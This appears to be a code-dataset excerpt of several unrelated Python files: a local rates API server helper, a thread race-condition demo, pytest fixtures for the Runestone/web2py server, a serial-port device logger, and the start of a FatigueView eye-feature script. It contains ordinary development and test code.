source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
rates_api_server.py | """ rates api server """
from contextlib import contextmanager
from collections.abc import Generator
import multiprocessing as mp
import requests
from requests.exceptions import RequestException
from rates_demo.rates_api import start_rates_api
@contextmanager
def rates_api_server() -> Generator[None, None, None]:
""" rates api server """
rates_api_process = mp.Process(target=start_rates_api)
rates_api_process.start()
while True:
try:
requests.request("GET", "http://127.0.0.1:5000/check")
break
except ConnectionError:
continue
except RequestException:
continue
yield
rates_api_process.terminate()
|
thread-3.py | #/usr/bin/env python
#coding=utf8
"""
# Author: kellanfan
# Created Time : Fri 21 Jul 2017 04:52:07 PM CST
# File Name: thread-3.py
# Description:
"""
import time, threading
# 假定这是你的银行存款:
balance = 0
def change_it(n):
# 先存后取,结果应该为0:
global balance
balance = balance + n
balance = balance - n
def run_thread(n):
for i in range(100000):
change_it(n)
t1 = threading.Thread(target=run_thread, args=(5,))
t2 = threading.Thread(target=run_thread, args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print balance
|
conftest.py | # ***************************************
# |docname| - pytest fixtures for testing
# ***************************************
#
# To get started on running tests, see tests/README.rst
#
# These fixtures start the web2py server then submit requests to it.
#
# **NOTE:** Make sure you don't have another server running, because it will grab the requests instead of letting the test server respond to requests.
#
# The overall testing approach is functional: rather than test a function, this file primarily tests endpoints on the web server. To accomplish this:
#
# - This file includes the `web2py_server` fixture to start a web2py server, and a fixture (`test_client`) to make requests of it. To make debug easier, the `test_client` class saves the HTML of a failing test to a file, and also saves any web2py tracebacks in the HTML form to a file.
# - The `runestone_db` and related classes provide the ability to access the web2py database directory, in order to set up and tear down test. In order to leave the database unchanged after a test, almost all routines that modify the database are wrapped in a context manager; on exit, then delete any modifications.
#
# .. contents::
#
# Imports
# =======
# These are listed in the order prescribed by `PEP 8
# <http://www.python.org/dev/peps/pep-0008/#imports>`_.
#
# Standard library
# ----------------
import sys
import time
import subprocess
from io import open
import json
import os
import re
from threading import Thread
import datetime
from shutil import rmtree, copytree
# Third-party imports
# -------------------
from gluon.contrib.webclient import WebClient
import gluon.shell
from html5validator.validator import Validator
import pytest
from pyvirtualdisplay import Display
# Import a shared fixture.
from runestone.shared_conftest import _SeleniumUtils, selenium_driver # noqa: F401
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from urllib.error import HTTPError, URLError
from urllib.request import urlopen
# Required to allow use of this class on a module-scoped fixture.
from _pytest.monkeypatch import MonkeyPatch
# Local imports
# -------------
from .utils import COVER_DIRS, DictToObject
from .ci_utils import xqt, pushd
# Set this to False if you want to turn off all web page validation.
W3_VALIDATE = True
# Pytest setup
# ============
# Add `command-line options <http://doc.pytest.org/en/latest/example/parametrize.html#generating-parameters-combinations-depending-on-command-line>`_.
def pytest_addoption(parser):
# Per the `API reference <http://doc.pytest.org/en/latest/reference.html#_pytest.hookspec.pytest_addoption>`,
# options are argparse style.
parser.addoption(
"--skipdbinit",
action="store_true",
help="Skip initialization of the test database.",
)
parser.addoption(
"--skip_w3_validate",
action="store_true",
help="Skip W3C validation of web pages.",
)
# Output a coverage report when testing is done. See https://docs.pytest.org/en/latest/reference.html#_pytest.hookspec.pytest_terminal_summary.
def pytest_terminal_summary(terminalreporter):
try:
cp = xqt(
"{} -m coverage report".format(sys.executable),
# Capture the output from the report.
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
except subprocess.CalledProcessError as e:
res = "Error in coverage report.\n{}".format(e.stdout + e.stderr)
else:
res = cp.stdout + cp.stderr
terminalreporter.write_line(res)
# Utilities
# =========
# A simple data-struct object.
class _object(object):
pass
# Create a web2py controller environment. This is taken from pieces of ``gluon.shell.run``. It returns a ``dict`` containing the environment.
def web2py_controller_env(
# _`application`: The name of the application to run in, as a string.
application,
):
env = gluon.shell.env(application, import_models=True)
env.update(gluon.shell.exec_pythonrc())
return env
# Fixtures
# ========
#
# web2py access
# -------------
# These fixtures provide access to the web2py Runestone server and its environment.
@pytest.fixture(scope="session")
def web2py_server_address():
return "http://127.0.0.1:8000"
# This fixture starts and shuts down the web2py server.
#
# Execute this `fixture <https://docs.pytest.org/en/latest/fixture.html>`_ once per `session <https://docs.pytest.org/en/latest/fixture.html#scope-sharing-a-fixture-instance-across-tests-in-a-class-module-or-session>`_.
@pytest.fixture(scope="session")
def web2py_server(runestone_name, web2py_server_address, pytestconfig):
password = "pass"
os.environ["WEB2PY_CONFIG"] = "test"
# HINT: make sure that ``0.py`` has something like the following, that reads this environment variable:
#
# .. code:: Python
# :number-lines:
#
# config = environ.get("WEB2PY_CONFIG","production")
#
# if config == "production":
# settings.database_uri = environ["DBURL"]
# elif config == "development":
# settings.database_uri = environ.get("DEV_DBURL")
# elif config == "test":
# settings.database_uri = environ.get("TEST_DBURL")
# else:
# raise ValueError("unknown value for WEB2PY_CONFIG")
# HINT: make sure that you export ``TEST_DBURL`` in your environment; it is
# not set here because it's specific to the local setup, possibly with a
# password, and thus can't be committed to the repo.
assert os.environ["TEST_DBURL"]
# Extract the components of the DBURL. The expected format is ``postgresql://user:password@netloc/dbname``, a simplified form of the `connection URI <https://www.postgresql.org/docs/9.6/static/libpq-connect.html#LIBPQ-CONNSTRING>`_.
empty1, postgres_ql, pguser, pgpassword, pgnetloc, dbname, empty2 = re.split(
"^postgres(ql)?://(.*):(.*)@(.*)/(.*)$", os.environ["TEST_DBURL"]
)
assert (not empty1) and (not empty2)
os.environ["PGPASSWORD"] = pgpassword
os.environ["PGUSER"] = pguser
os.environ["DBHOST"] = pgnetloc
rs_path = "applications/{}".format(runestone_name)
# Assume we are running with working directory in tests.
if pytestconfig.getoption("skipdbinit"):
print("Skipping DB initialization.")
else:
# In the future, to print the output of the init/build process, see `pytest #1599 <https://github.com/pytest-dev/pytest/issues/1599>`_ for code to enable/disable output capture inside a test.
#
# Make sure runestone_test is nice and clean -- this will remove many
# tables that web2py will then re-create.
xqt("rsmanage --verbose initdb --reset --force")
# Copy the test book to the books directory.
rmtree("{}/books/test_course_1".format(rs_path), ignore_errors=True)
# Sometimes this fails for no good reason on Windows. Retry.
for retry in range(100):
try:
copytree(
"{}/tests/test_course_1".format(rs_path),
"{}/books/test_course_1".format(rs_path),
)
break
except OSError:
if retry == 99:
raise
# Build the test book to add in db fields needed.
with pushd(
"{}/books/test_course_1".format(rs_path)
), MonkeyPatch().context() as m:
# The runestone build process only looks at ``DBURL``.
m.setenv("DBURL", os.environ["TEST_DBURL"])
xqt(
"{} -m runestone build --all".format(sys.executable),
"{} -m runestone deploy".format(sys.executable),
)
xqt("{} -m coverage erase".format(sys.executable))
# For debug:
#
# #. Uncomment the next three lines.
# #. Set ``WEB2PY_CONFIG`` to ``test``; all the other usual Runestone environment variables must also be set.
# #. Run ``python -m celery --app=scheduled_builder worker --pool=gevent --concurrency=4 --loglevel=info`` from ``applications/runestone/modules`` to use the scheduler. I'm assuming the redis server (which the tests needs regardless of debug) is also running.
# #. Run a test (in a separate window). When the debugger stops at the lines below:
#
# #. Run web2py manually to see all debug messages. Use a command line like ``python web2py.py -a pass``.
# #. After web2py is started, type "c" then enter to continue the debugger and actually run the tests.
##import pdb; pdb.set_trace()
##yield DictToObject(dict(password=password))
##return
# Start the web2py server and the `web2py scheduler <http://web2py.com/books/default/chapter/29/04/the-core#Scheduler-Deployment>`_.
web2py_server = subprocess.Popen(
[
sys.executable,
"-m",
"coverage",
"run",
"--append",
"--source=" + COVER_DIRS,
"web2py.py",
"-a",
password,
"--no_gui",
"--minthreads=10",
"--maxthreads=20",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
# Produce text (not binary) output for nice output in ``echo()`` below.
universal_newlines=True,
)
# Wait for the webserver to come up.
for tries in range(50):
try:
urlopen(web2py_server_address, timeout=5)
except URLError:
# Wait for the server to come up.
time.sleep(0.1)
else:
# The server is up. We're done.
break
# Run Celery. Per https://github.com/celery/celery/issues/3422, it sounds like celery doesn't support coverage, so omit it.
celery_process = subprocess.Popen(
[
sys.executable,
"-m",
"celery",
"--app=scheduled_builder",
"worker",
"--pool=gevent",
"--concurrency=4",
"--loglevel=info",
],
# Celery must be run in the ``modules`` directory, where the worker is defined.
cwd="{}/modules".format(rs_path),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
# Produce text (not binary) output for nice output in ``echo()`` below.
universal_newlines=True,
)
# Start a thread to read web2py output and echo it.
def echo(popen_obj, description_str):
stdout, stderr = popen_obj.communicate()
print("\n" "{} stdout\n" "--------------------\n".format(description_str))
print(stdout)
print("\n" "{} stderr\n" "--------------------\n".format(description_str))
print(stderr)
echo_threads = [
Thread(target=echo, args=(web2py_server, "web2py server")),
Thread(target=echo, args=(celery_process, "celery process")),
]
# TODO: Redis for Windows.
for echo_thread in echo_threads:
echo_thread.start()
# Save the password used.
web2py_server.password = password
# Wait for the server to come up. The delay varies; this is a guess.
# After this comes the `teardown code <https://docs.pytest.org/en/latest/fixture.html#fixture-finalization-executing-teardown-code>`_.
yield web2py_server
# Terminate the server and schedulers to give web2py time to shut down gracefully.
web2py_server.terminate()
celery_process.terminate()
for echo_thread in echo_threads:
echo_thread.join()
# The name of the Runestone controller. It must be module scoped to allow the ``web2py_server`` to use it.
@pytest.fixture(scope="session")
def runestone_name():
return "runestone"
# The environment of a web2py controller.
@pytest.fixture
def runestone_env(runestone_name):
env = web2py_controller_env(runestone_name)
yield env
# Close the database connection after the test completes.
env["db"].close()
# Create fixture providing a web2py controller environment for a Runestone application.
@pytest.fixture
def runestone_controller(runestone_env):
return DictToObject(runestone_env)
# Database
# --------
# This fixture provides access to a clean instance of the Runestone database.
#
# Provide acess the the Runestone database through a fixture. After a test runs,
# restore the database to its initial state.
@pytest.fixture
def runestone_db(runestone_controller):
db = runestone_controller.db
yield db
# **Restore the database state after the test finishes**
##------------------------------------------------------
# Rollback changes, which ensures that any errors in the database connection
# will be cleared.
db.rollback()
# This list was generated by running the following query, taken from
# https://dba.stackexchange.com/a/173117. Note that the query excludes
# specific tables, which the ``runestone build`` populates and which
# should not be modified otherwise. One method to identify these tables
# which should not be truncated is to run ``pg_dump --data-only
# $TEST_DBURL > out.sql`` on a clean database, then inspect the output to
# see which tables have data. It also excludes all the scheduler tables,
# since truncating these tables makes the process take a lot longer.
#
# The query is:
## SELECT input_table_name || ',' AS truncate_query FROM(SELECT table_schema || '.' || table_name AS input_table_name FROM information_schema.tables WHERE table_schema NOT IN ('pg_catalog', 'information_schema') AND table_name NOT IN ('questions', 'source_code', 'chapters', 'sub_chapters', 'scheduler_run', 'scheduler_task', 'scheduler_task_deps', 'scheduler_worker') AND table_schema NOT LIKE 'pg_toast%') AS information order by input_table_name;
db.executesql(
"""TRUNCATE
public.assignment_questions,
public.assignments,
public.auth_cas,
public.auth_event,
public.auth_group,
public.auth_membership,
public.auth_permission,
public.auth_user,
public.clickablearea_answers,
public.code,
public.codelens_answers,
public.course_attributes,
public.course_instructor,
public.course_practice,
public.courses,
public.dragndrop_answers,
public.fitb_answers,
public.grades,
public.lp_answers,
public.invoice_request,
public.lti_keys,
public.mchoice_answers,
public.parsons_answers,
public.payments,
public.practice_grades,
public.question_grades,
public.question_tags,
public.shortanswer_answers,
public.sub_chapter_taught,
public.tags,
public.timed_exam,
public.useinfo,
public.user_biography,
public.user_chapter_progress,
public.user_courses,
public.user_state,
public.user_sub_chapter_progress,
public.user_topic_practice,
public.user_topic_practice_completion,
public.user_topic_practice_feedback,
public.user_topic_practice_log,
public.user_topic_practice_survey,
public.web2py_session_runestone CASCADE;
"""
)
db.commit()
# Provide a class for manipulating the Runestone database.
class _RunestoneDbTools(object):
def __init__(self, runestone_db):
self.db = runestone_db
# Create a new course. It returns an object with information about the created course.
def create_course(
self,
# The name of the course to create, as a string.
course_name="test_child_course_1",
# The start date of the course, as a string.
term_start_date="2000-01-01",
# The value of the ``login_required`` flag for the course.
login_required=True,
# The base course for this course. If ``None``, it will use ``course_name``.
base_course="test_course_1",
# The student price for this course.
student_price=None,
):
# Sanity check: this class shouldn't exist.
db = self.db
assert not db(db.courses.course_name == course_name).select().first()
# Create the base course if it doesn't exist.
if course_name != base_course and not db(
db.courses.course_name == base_course
).select(db.courses.id):
self.create_course(
base_course, term_start_date, login_required, base_course, student_price
)
# Store these values in an object for convenient access.
obj = _object()
obj.course_name = course_name
obj.term_start_date = term_start_date
obj.login_required = login_required
obj.base_course = base_course
obj.student_price = student_price
obj.course_id = db.courses.insert(
course_name=course_name,
base_course=obj.base_course,
term_start_date=term_start_date,
login_required=login_required,
student_price=student_price,
)
db.commit()
return obj
def make_instructor(
self,
# The ID of the user to make an instructor.
user_id,
# The ID of the course in which the user will be an instructor.
course_id,
):
db = self.db
course_instructor_id = db.course_instructor.insert(
course=course_id, instructor=user_id
)
db.commit()
return course_instructor_id
# Present ``_RunestoneDbTools`` as a fixture.
@pytest.fixture
def runestone_db_tools(runestone_db):
return _RunestoneDbTools(runestone_db)
# HTTP client
# -----------
# Provide access to Runestone through HTTP.
#
# Given the ``test_client.text``, prepare to write it to a file.
def _html_prep(text_str):
return text_str.replace("\r\n", "\n").encode("utf-8")
# Create a client for accessing the Runestone server.
class _TestClient(WebClient):
def __init__(
self,
web2py_server,
web2py_server_address,
runestone_name,
tmp_path,
pytestconfig,
):
self.web2py_server = web2py_server
self.web2py_server_address = web2py_server_address
self.tmp_path = tmp_path
self.pytestconfig = pytestconfig
super(_TestClient, self).__init__(
"{}/{}/".format(self.web2py_server_address, runestone_name), postbacks=True
)
# Use the W3C validator to check the HTML at the given URL.
def validate(
self,
# The relative URL to validate.
url,
# An optional string that, if provided, must be in the text returned by the server. If this is a sequence of strings, all of the provided strings must be in the text returned by the server.
expected_string="",
# The number of validation errors expected. If None, no validation is performed.
expected_errors=None,
# The expected status code from the request.
expected_status=200,
# All additional keyword arguments are passed to the ``post`` method.
**kwargs,
):
try:
try:
self.post(url, **kwargs)
except HTTPError as e:
# If this was the expected result, return.
if e.code == expected_status:
# Since this is an error of some type, these paramets must be empty, since they can't be checked.
assert not expected_string
assert not expected_errors
return ""
else:
raise
assert self.status == expected_status
if expected_string:
if isinstance(expected_string, str):
assert expected_string in self.text
else:
# Assume ``expected_string`` is a sequence of strings.
assert all(string in self.text for string in expected_string)
if expected_errors is not None and not self.pytestconfig.getoption(
"skip_w3_validate"
):
# Redo this section using html5validate command line
vld = Validator(errors_only=True, stack_size=2048)
tmpname = self.tmp_path / "tmphtml.html"
with open(tmpname, "w", encoding="utf8") as f:
f.write(self.text)
errors = vld.validate([str(tmpname)])
assert errors <= expected_errors
return self.text
except AssertionError:
# Save the HTML to make fixing the errors easier. Note that ``self.text`` is already encoded as utf-8.
validation_file = url.replace("/", "-") + ".html"
with open(validation_file, "wb") as f:
f.write(_html_prep(self.text))
print("Validation failure saved to {}.".format(validation_file))
raise
except RuntimeError as e:
# Provide special handling for web2py exceptions by saving the
# resulting traceback.
if e.args[0].startswith("ticket "):
# Create a client to access the admin interface.
admin_client = WebClient(
"{}/admin/".format(self.web2py_server_address), postbacks=True
)
# Log in.
admin_client.post("", data={"password": self.web2py_server.password})
assert admin_client.status == 200
# Get the error.
error_code = e.args[0][len("ticket ") :]
admin_client.get("default/ticket/" + error_code)
assert admin_client.status == 200
# Save it to a file.
traceback_file = (
"".join(c if c not in r"\/:*?<>|" else "_" for c in url)
+ "_traceback.html"
)
with open(traceback_file, "wb") as f:
f.write(_html_prep(admin_client.text))
print("Traceback saved to {}.".format(traceback_file))
raise
def logout(self):
self.validate("default/user/logout", "Logged out")
# Always logout after a test finishes.
def tearDown(self):
self.logout()
# Present ``_TestClient`` as a fixure.
@pytest.fixture
def test_client(
web2py_server, web2py_server_address, runestone_name, tmp_path, pytestconfig
):
tc = _TestClient(
web2py_server, web2py_server_address, runestone_name, tmp_path, pytestconfig
)
yield tc
tc.tearDown()
# User
# ^^^^
# Provide a method to create a user and perform common user operations.
class _TestUser(object):
def __init__(
self,
# These are fixtures.
test_client,
runestone_db_tools,
# The username for this user.
username,
# The password for this user.
password,
# The course object returned by ``create_course`` this user will register for.
course,
# True if the course is free (no payment required); False otherwise.
is_free=True,
# The first name for this user.
first_name="test",
# The last name for this user.
last_name="user",
):
self.test_client = test_client
self.runestone_db_tools = runestone_db_tools
self.username = username
self.first_name = first_name
self.last_name = last_name
self.email = self.username + "@foo.com"
self.password = password
self.course = course
self.is_free = is_free
# Registration doesn't work unless we're logged out.
self.test_client.logout()
# Now, post the registration.
self.test_client.validate(
"default/user/register",
"Support Runestone Interactive" if self.is_free else "Payment Amount",
data=dict(
username=self.username,
first_name=self.first_name,
last_name=self.last_name,
# The e-mail address must be unique.
email=self.email,
password=self.password,
password_two=self.password,
# Note that ``course_id`` is (on the form) actually a course name.
course_id=self.course.course_name,
accept_tcp="on",
donate="0",
_next="/runestone/default/index",
_formname="register",
),
)
# Record IDs
db = self.runestone_db_tools.db
self.user_id = (
db(db.auth_user.username == self.username)
.select(db.auth_user.id)
.first()
.id
)
def login(self):
self.test_client.validate(
"default/user/login",
data=dict(
username=self.username, password=self.password, _formname="login"
),
)
def logout(self):
self.test_client.logout()
def make_instructor(self, course_id=None):
# If ``course_id`` isn't specified, use this user's ``course_id``.
course_id = course_id or self.course.course_id
return self.runestone_db_tools.make_instructor(self.user_id, course_id)
# A context manager to update this user's profile. If a course was added, it returns that course's ID; otherwise, it returns None.
def update_profile(
self,
# This parameter is passed to ``test_client.validate``.
expected_string=None,
# An updated username, or ``None`` to use ``self.username``.
username=None,
# An updated first name, or ``None`` to use ``self.first_name``.
first_name=None,
# An updated last name, or ``None`` to use ``self.last_name``.
last_name=None,
# An updated email, or ``None`` to use ``self.email``.
email=None,
# An updated last name, or ``None`` to use ``self.course.course_name``.
course_name=None,
# A shortcut for specifying the ``expected_string``, which only applies if ``expected_string`` is not set. Use ``None`` if a course will not be added, ``True`` if the added course is free, or ``False`` if the added course is paid.
is_free=None,
# The value of the ``accept_tcp`` checkbox; provide an empty string to leave unchecked. The default value leaves it checked.
accept_tcp="on",
):
if expected_string is None:
if is_free is None:
expected_string = "Course Selection"
else:
expected_string = (
"Support Runestone Interactive" if is_free else "Payment Amount"
)
username = username or self.username
first_name = first_name or self.first_name
last_name = last_name or self.last_name
email = email or self.email
course_name = course_name or self.course.course_name
# Perform the update.
self.test_client.validate(
"default/user/profile",
expected_string,
data=dict(
username=username,
first_name=first_name,
last_name=last_name,
email=email,
# Though the field is ``course_id``, it's really the course name.
course_id=course_name,
accept_tcp=accept_tcp,
_next="/runestone/default/index",
id=str(self.user_id),
_formname="auth_user/" + str(self.user_id),
),
)
# Call this after registering for a new course or adding a new course via ``update_profile`` to pay for the course.
def make_payment(
self,
# The `Stripe test tokens <https://stripe.com/docs/testing#cards>`_ to use for payment.
stripe_token,
# The course ID of the course to pay for. None specifies ``self.course.course_id``.
course_id=None,
):
course_id = course_id or self.course.course_id
# Get the signature from the HTML of the payment page.
self.test_client.validate("default/payment")
match = re.search(
'<input type="hidden" name="signature" value="([^ ]*)" />',
self.test_client.text,
)
signature = match.group(1)
html = self.test_client.validate(
"default/payment", data=dict(stripeToken=stripe_token, signature=signature)
)
assert ("Thank you for your payment" in html) or ("Payment failed" in html)
def hsblog(self, **kwargs):
# Get the time, rounded down to a second, before posting to the server.
ts = datetime.datetime.utcnow()
ts -= datetime.timedelta(microseconds=ts.microsecond)
if "course" not in kwargs:
kwargs["course"] = self.course.course_name
if "answer" not in kwargs and "act" in kwargs:
kwargs["answer"] = kwargs["act"]
# Post to the server.
return json.loads(self.test_client.validate("ajax/hsblog", data=kwargs))
def coursechooser(self, course_name):
html = self.test_client.validate("default/coursechooser/{}".format(course_name))
# Make sure this didn't send us to the user profile page to add a course we aren't registered for.
assert "Course IDs for open courses" not in html
def removecourse(self, course_name):
html = self.test_client.validate("default/removecourse/{}".format(course_name))
assert "Sorry, you cannot remove" not in html
assert "Course Selection" in html
# Present ``_TestUser`` as a fixture.
@pytest.fixture
def test_user(test_client, runestone_db_tools):
return lambda *args, **kwargs: _TestUser(
test_client, runestone_db_tools, *args, **kwargs
)
# Provide easy access to a test user and course.
@pytest.fixture
def test_user_1(runestone_db_tools, test_user):
course = runestone_db_tools.create_course()
return test_user("test_user_1", "password_1", course)
# Assigmment
# ^^^^^^^^^^
class _TestAssignment(object):
assignment_count = 0
def __init__(
self,
test_client,
test_user,
runestone_db_tools,
aname,
course,
is_visible=False,
):
self.test_client = test_client
self.runestone_db_tools = runestone_db_tools
self.assignment_name = aname
self.course = course
self.description = "default description"
self.is_visible = is_visible
self.due = datetime.datetime.utcnow() + datetime.timedelta(days=7)
self.assignment_instructor = test_user(
"assign_instructor_{}".format(_TestAssignment.assignment_count),
"password",
course,
)
self.assignment_instructor.make_instructor()
self.assignment_instructor.login()
self.assignment_id = json.loads(
self.test_client.validate(
"admin/createAssignment", data={"name": self.assignment_name}
)
)[self.assignment_name]
assert self.assignment_id
_TestAssignment.assignment_count += 1
def addq_to_assignment(self, **kwargs):
if "points" not in kwargs:
kwargs["points"] = 1
kwargs["assignment"] = self.assignment_id
res = self.test_client.validate(
"admin/add__or_update_assignment_question", data=kwargs
)
res = json.loads(res)
assert res["status"] == "success"
def autograde(self, sid=None):
print("autograding", self.assignment_name)
vars = dict(assignment=self.assignment_name)
if sid:
vars["sid"] = sid
res = json.loads(self.test_client.validate("assignments/autograde", data=vars))
assert res["message"].startswith("autograded")
return res
def questions(self):
"""
Return a list of all (id, name) values for each question
in an assignment
"""
db = self.runestone_db_tools.db
a_q_rows = db(
(db.assignment_questions.assignment_id == self.assignment_id)
& (db.assignment_questions.question_id == db.questions.id)
).select(orderby=db.assignment_questions.sorting_priority)
res = []
for row in a_q_rows:
res.append(tuple([row.questions.id, row.questions.name]))
return res
def calculate_totals(self):
assert json.loads(
self.test_client.validate(
"assignments/calculate_totals",
data=dict(assignment=self.assignment_name),
)
)["success"]
def make_visible(self):
self.is_visible = True
self.save_assignment()
def set_duedate(self, newdeadline):
"""
the newdeadline should be a datetime object
"""
self.due = newdeadline
self.save_assignment()
def save_assignment(self):
assert (
json.loads(
self.test_client.validate(
"admin/save_assignment",
data=dict(
assignment_id=self.assignment_id,
visible="T" if self.is_visible else "F",
description=self.description,
due=str(self.due),
),
)
)["status"]
== "success"
)
def release_grades(self):
self.test_client.post(
"admin/releasegrades",
data=dict(assignmentid=self.assignment_id, released="yes"),
)
assert self.test_client.text == "Success"
@pytest.fixture
def test_assignment(test_client, test_user, runestone_db_tools):
return lambda *args, **kwargs: _TestAssignment(
test_client, test_user, runestone_db_tools, *args, **kwargs
)
# Selenium
# --------
# Provide access to Runestone through a web browser using Selenium. There's a lot of shared code between these tests and the Runestone Component tests using Selenium; see `shared_conftest.py` for details.
#
# Create an instance of Selenium once per testing session.
@pytest.fixture(scope="session")
def selenium_driver_session():
# Start a virtual display for Linux.
is_linux = sys.platform.startswith("linux")
if is_linux:
display = Display(visible=0, size=(1280, 1024))
display.start()
else:
display = None
# Start up the Selenium driver.
options = Options()
options.add_argument("--window-size=1200,800")
# When run as root, Chrome complains ``Running as root without --no-sandbox is not supported. See https://crbug.com/638180.`` Here's a `crude check for being root <https://stackoverflow.com/a/52621917>`_.
if is_linux and os.geteuid() == 0:
options.add_argument("--no-sandbox")
driver = webdriver.Chrome(options=options)
yield driver
# Shut everything down.
driver.close()
driver.quit()
if display:
display.stop()
# Provide additional server methods for Selenium.
class _SeleniumServerUtils(_SeleniumUtils):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.user = None
def login(
self,
# A ``_TestUser`` instance.
test_user,
):
self.get("default/user/login")
self.driver.find_element_by_id("auth_user_username").send_keys(
test_user.username
)
self.driver.find_element_by_id("auth_user_password").send_keys(
test_user.password
)
self.driver.find_element_by_id("login_button").click()
self.user = test_user
def logout(self):
self.get("default/user/logout")
# For some strange reason, the server occasionally doesn't put the "Logged out" message on a logout. ???
try:
self.wait.until(
EC.text_to_be_present_in_element(
(By.CSS_SELECTOR, "div.flash"), "Logged out"
)
)
except TimeoutException:
# Assume that visiting the logout URL then waiting for a timeout will ensure the logout worked, even if the message can't be found.
pass
self.user = None
def get_book_url(self, url):
return self.get(f"books/published/test_course_1/{url}")
# Present ``_SeleniumServerUtils`` as a fixture.
@pytest.fixture
def selenium_utils(
selenium_driver, web2py_server_address, runestone_name # noqa: F811
):
return _SeleniumServerUtils(
selenium_driver, f"{web2py_server_address}/{runestone_name}"
)
# A fixture to login to the test_user_1 account using Selenium before testing, then logout when the tests complete.
@pytest.fixture
def selenium_utils_user(selenium_utils, test_user_1):
selenium_utils.login(test_user_1)
yield selenium_utils
selenium_utils.logout()
|
serialport.py | # coding= utf-8
import serial
from threading import Thread
import serial.tools.list_ports
import time
class SerialPort:
def __init__(self, iport, fileWriter=None, baudRate=115200, showLog=False):
self.zeroCount = 0
self._port = iport
self._baudRate = baudRate
self._showLog = showLog
self._read_thread = None
self._entity = None
self._file = fileWriter
self.callback = None
self.supportListener = None
self.checkedSupportFmi = True
self.isRunning = True
self.cycleTime = time.time()
self.state = 0
self.coldRsetLimit = 100
self.warmResetInterval = 0
self.logTime = None
def setCallback(self, callback):
self.callback = callback
def logStateTime(self, logTime, warmResetInterval=0):
self.logTime = logTime
self.warmResetInterval = warmResetInterval
def setSupportFmi(self, supportListener):
self.supportListener = supportListener
def getSupportFmi(self):
return self.checkedSupportFmi
def getPort(self):
return self._port
def setFile(self, fileWriter, timeStr):
self._file = fileWriter
self._file.write('StartTime =' + timeStr + '\r\n')
def writeSerialData(self, value):
if self._file is not None:
self._file.write(value)
def is_running(self):
return self._entity.isOpen() & self.isRunning
def open_serial(self):
try:
self._entity = serial.Serial(self._port, self._baudRate, timeout=3)
except Exception:
raise IOError(f'can not open serial{self._port}:{self._baudRate}')
def close_serial(self):
self.isRunning = False
if self._entity is not None:
self._entity.close()
if self._file:
self._file.close()
def send_data(self, data):
if self._entity.is_open:
if type(data) is str:
data = data.encode()
try:
self._entity.write(data)
self._entity.flush()
except Exception:
return
print("send data", data)
def read_data(self):
try:
data = self._entity.readline()
except Exception as e:
print('read_data', e)
self.isRunning = False
return
if self.checkedSupportFmi:
if (b"\r\n" in data) or (b'$VERSION' in data):
self.checkedSupportFmi = False
if self.supportListener is not None:
self.supportListener(self._port)
if len(data) <= 0:
return None
# if self._showLog is True:
# if self.callback is not None:
# self.autoTest(data)
if self.logTime:
print(data)
self.autoTest(data)
if self._file:
self._file.write(data)
def notify(self, data):
try:
if self._entity.is_open & self.isRunning:
self._entity.write(data)
except Exception as e:
print(e)
pass
def read_thread(self):
while self._entity.is_open & self.isRunning:
self.read_data()
def start(self):
if self._entity is None:
self.open_serial()
if self._read_thread is None:
self._read_thread = None
self._read_thread = Thread(target=self.read_thread, daemon=True)
self._read_thread.start()
def autoTest(self, data):
strData = str(data)
if time.time() - self.cycleTime > 300:
self.warmStart()
if 'E,1' in strData and self.state != 1:
self.state = 1
self.writeLog(1)
elif 'E,5' in strData and self.state != 5:
self.state = 5
self.writeLog(5)
elif 'E,4' in strData and self.state != 4 and self.state != 0:
self.state = 4
self.writeLog(4)
self.warmStart()
elif 'cors up' in strData:
self._file.write('TIME,cors_up,%d,%d\r\n' % (self.cycleTime, time.time() - self.cycleTime))
elif 'E,4' in strData and self.state == 0:
if time.time() - self.cycleTime > 3:
self.warmStart()
elif 'open error path' in strData:
self.coldReset()
def reset(self):
self.callback(self._port)
def warmStart(self):
self.coldRsetLimit -= 1
# cold reset after warm reset 100 times
if self.coldRsetLimit <= 0:
self.coldReset()
self.coldRsetLimit = 100
return
self.send_data('AT+WARM_RESET\r\n')
self.cycleTime = time.time()
self.state = 0
self._file.write("TIME,warm reset:%d,%s\r\n" % (
self.cycleTime, time.strftime('%d %H%M%S', time.localtime(time.time())),))
def coldReset(self):
self.state = 0
self.send_data('AT+COLD_RESET\r\n')
self._file.write("TIME,cold reset:%d,%s\r\n" % (
time.time(), time.strftime('%d %H%M%S', time.localtime(time.time()))))
def writeLog(self, state):
self._file.write("TIME,status:%d,%d,%d\r\n" % (state, self.cycleTime, time.time() - self.cycleTime))
|
generate_dataset_from_FatigueView.py | # -*- coding: UTF-8 -*-
'''=================================================
@Author :zhenyu.yang
@Date :2020/11/5 11:37 AM
=================================================='''
import sys
sys.path.append('./')
sys.path.insert(0,'/data/zhenyu.yang/modules')
import cv2
import json
import numpy as np
import random
import copy
from multiprocessing import Process
import os
def getFiles(path, suffix,prefix):
return [os.path.join(root, file) for root, dirs, files in os.walk(path)
for file in files if file.endswith(suffix) and file.startswith(prefix)]
def get_ear(ldmk):
eps = 1e-5
get_distance = lambda x,y:((x[0]-y[0])**2 + (x[1]-y[1])**2 + eps)**0.5
w = get_distance(ldmk[0],ldmk[4])
h = get_distance(ldmk[2],ldmk[6])
ear = h/w
ear = min(ear,0.7)
return ear
def get_ear_height(ldmk):
heights = [ldmk[2][1]-ldmk[6][1],ldmk[1][1]-ldmk[7][1],ldmk[3][1]-ldmk[5][1]]
return np.mean(np.abs(heights))
def get_fea_label(img_info):
eye_center = [-1,-1]
if 'ldmk' in img_info and img_info['ldmk'] is not None and len(img_info['ldmk']) > 4:
ldmk = np.array(img_info['ldmk'])
eye_ldmk = ldmk[36:47]
x,y = np.mean(eye_ldmk,axis= 0)
eye_center = [x,y]
return eye_center
def get_perclose(height_list):
max_height = max(height_list)
preclose_list = [1 - v/max_height for v in height_list]
preclose_50 = sum(v > 0.5 for v in preclose_list)
preclose_70 = sum(v > 0.7 for v in preclose_list)
preclose_90 = sum(v > 0.9 for v in preclose_list)
return [preclose_50,preclose_70,preclose_90]
